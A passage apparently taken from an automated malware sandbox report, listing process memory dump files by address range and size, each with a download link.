    • memory/4052-15-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4052-16-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4052-22-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4052-14-0x0000018CE3840000-0x0000018CE3862000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4052-4-0x00007FFC4F9C3000-0x00007FFC4F9C5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4736-66-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4736-64-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4736-62-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4736-59-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download